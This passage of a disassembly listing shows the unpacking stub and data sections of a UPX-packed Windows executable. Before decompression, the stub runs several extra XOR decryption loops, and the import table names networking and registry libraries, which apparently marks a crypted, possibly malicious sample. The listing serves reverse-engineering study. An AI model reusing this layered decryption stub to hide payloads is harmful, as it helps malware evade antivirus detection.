cmp ebx, ecx
jnz short loc_47FD35
add eax, edx
mov ecx, [eax]
add eax, edx
mov edi, eax
mov eax, esi
sub eax, edi
dec eax
dec eax
dec eax
mov ebx, edx
xor edx, edx
div ebx
mov esi, edi
loc_47FD53: ; CODE XREF: sub_47FD26+34�j
xor [esi], ecx
add esi, ebx
dec eax
test eax, eax
jnz short loc_47FD53
jmp edi
sub_47FD26 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_47FD5E: ; CODE XREF: start+14�j
call sub_47FD26
inc esp
xor esp, [edx]
adc [ecx], edx
and ebp, [ebx+ebx+5E5F5A59h]
push esi
push ecx
mov ecx, 13D10h
push ecx
mov ebx, esi
mov edx, [esi]
inc esi
loc_47FD7C: ; CODE XREF: start+7C�j
cmp ecx, 1
jle short loc_47FD8E
mov al, [esi]
xor al, dl
mov [esi], al
inc esi
dec ecx
jmp short loc_47FD7C
; ---------------------------------------------------------------------------
loc_47FD8E: ; CODE XREF: start+72�j
pop ecx
push ecx
mov esi, ebx
mov edx, 0FFFFFFFFh
loc_47FD97: ; CODE XREF: start+9D�j
cmp ecx, 0
jle short loc_47FDAF
mov al, [esi]
xor al, dl
mov [esi], al
sub edx, 3
inc esi
dec ecx
jmp short loc_47FD97
; ---------------------------------------------------------------------------
loc_47FDAF: ; CODE XREF: start+8D�j
pop ecx
push ecx
mov esi, ebx
mov edx, 0
loc_47FDB8: ; CODE XREF: start+B9�j
cmp ecx, 0
jle short loc_47FDCB
mov al, [esi]
xor al, dl
mov [esi], al
inc edx
inc esi
dec ecx
jmp short loc_47FDB8
; ---------------------------------------------------------------------------
loc_47FDCB: ; CODE XREF: start+AE�j
pop ecx
mov esi, ebx
loc_47FDCE: ; CODE XREF: start+CF�j
cmp ecx, 0
jle short loc_47FDE1
mov al, [esi]
xor al, 0A5h
mov [esi], al
inc edx
inc esi
dec ecx
jmp short loc_47FDCE
; ---------------------------------------------------------------------------
loc_47FDE1: ; CODE XREF: start+C4�j
nop
nop
jmp loc_47FDF0
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
db 4 dup(90h)
dd 11223344h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_47FDF0: ; CODE XREF: start+D3�j
pop ecx
pop esi
nop
nop
nop
jmp short loc_47FE07
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
db 6 dup(90h)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_47FDFD: ; CODE XREF: start:loc_47FE0E�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_47FE03: ; CODE XREF: start+19F�j start+1B6�j
add ebx, ebx
jnz short loc_47FE0E
loc_47FE07: ; CODE XREF: start+E5�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_47FE0E: ; CODE XREF: start+F5�j
jb short loc_47FDFD
mov eax, 1
loc_47FE15: ; CODE XREF: start+12F�j
add ebx, ebx
jnz short loc_47FE20
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_47FE20: ; CODE XREF: start+107�j
adc eax, eax
add ebx, ebx
jnb short loc_47FE31
jnz short loc_47FE41
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jb short loc_47FE41
loc_47FE31: ; CODE XREF: start+114�j
dec eax
add ebx, ebx
jnz short loc_47FE3D
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_47FE3D: ; CODE XREF: start+124�j
adc eax, eax
jmp short loc_47FE15
; ---------------------------------------------------------------------------
loc_47FE41: ; CODE XREF: start+116�j start+11F�j
xor ecx, ecx
sub eax, 3
jb short loc_47FE59
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_47FECB
sar eax, 1
mov ebp, eax
jmp short loc_47FE64
; ---------------------------------------------------------------------------
loc_47FE59: ; CODE XREF: start+136�j
add ebx, ebx
jnz short loc_47FE64
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_47FE64: ; CODE XREF: start+147�j start+14B�j
adc ecx, ecx
add ebx, ebx
jnz short loc_47FE71
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_47FE71: ; CODE XREF: start+158�j
adc ecx, ecx
jnz short loc_47FE95
inc ecx
loc_47FE76: ; CODE XREF: start+175�j start+180�j
add ebx, ebx
jnz short loc_47FE81
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_47FE81: ; CODE XREF: start+168�j
adc ecx, ecx
add ebx, ebx
jnb short loc_47FE76
jnz short loc_47FE92
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_47FE76
loc_47FE92: ; CODE XREF: start+177�j
add ecx, 2
loc_47FE95: ; CODE XREF: start+163�j
cmp ebp, 0FFFFFB00h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_47FEB5
loc_47FEA6: ; CODE XREF: start+19D�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_47FEA6
jmp loc_47FE03
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_47FEB5: ; CODE XREF: start+194�j start+1B2�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_47FEB5
add edi, ecx
jmp loc_47FE03
; ---------------------------------------------------------------------------
loc_47FECB: ; CODE XREF: start+141�j
pop esi
mov edi, esi
mov ecx, 0C8Eh
loc_47FED3: ; CODE XREF: start+1CA�j start+1CF�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_47FED8: ; CODE XREF: start+1ED�j
cmp al, 1
ja short loc_47FED3
cmp byte ptr [edi], 11h
jnz short loc_47FED3
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_47FED8
lea edi, [esi+7D000h]
loc_47FF05: ; CODE XREF: start+217�j
mov eax, [edi]
or eax, eax
jz short loc_47FF50
mov ebx, [edi+4]
lea eax, [eax+esi+7F000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+7F08Ch]
xchg eax, ebp
loc_47FF22: ; CODE XREF: start+238�j
mov al, [edi]
inc edi
or al, al
jz short loc_47FF05
mov ecx, edi
jns short near ptr loc_47FF33+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_47FF33: ; CODE XREF: start+21B�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7F090h]
or eax, eax
jz short loc_47FF4A
mov [ebx], eax
add ebx, 4
jmp short loc_47FF22
; ---------------------------------------------------------------------------
loc_47FF4A: ; CODE XREF: start+231�j
call dword ptr [esi+7F094h]
loc_47FF50: ; CODE XREF: start+1F9�j
popa
jmp loc_41A4F7
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
align 100h
UPX1 ends
; Section 3. (virtual address 00080000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00080000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 480000h
dd 3 dup(0)
aM:
unicode 0, <Ä>
dw 8
unicode 0, <Œ>
dw 8
unicode 0, <>,0
align 10h
unicode 0, <Ñ>
dw 8
unicode 0, <œ>
dw 8
unicode 0, <>,0
align 4
dd 2 dup(0)
aD:
unicode 0, <Þ>
dw 8
unicode 0, <¤>
dw 8
unicode 0, <>,0
align 10h
dd 2 dup(0)
aM_0:
unicode 0, <ê>
dw 8
unicode 0, <¬>
dw 8
unicode 0, <>,0
align 4
dd 2 dup(0)
dd 800F5h, 800B4h, 3 dup(0)
dd 80101h, 800BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
aEcW db 'eC-w',0
align 4
aRW db 'ìrÔw',0
align 4
aPV db '¶¯ v',0
align 4
aLq db '¿+«q',0
align 4
aKernel32_dll_0 db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aShlwapi_dll db 'SHLWAPI.dll',0
aUser32_dll_0 db 'USER32.dll',0
aWininet_dll db 'WININET.dll',0
aWs2_32_dll db 'WS2_32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74697845h, 636F7250h, 737365h, 65520000h
dd 6F6C4367h, 654B6573h, 79h, 70736E77h, 746E6972h, 4166h
dd 72616843h, 7478654Eh, 41h, 65746E49h, 74656E72h, 6E65704Fh
dd 41h, 3A4h dup(0)
UPX2 ends
; Section 4. (virtual address 00081000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00081000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 481000h
align 2000h
_idata2 ends
end start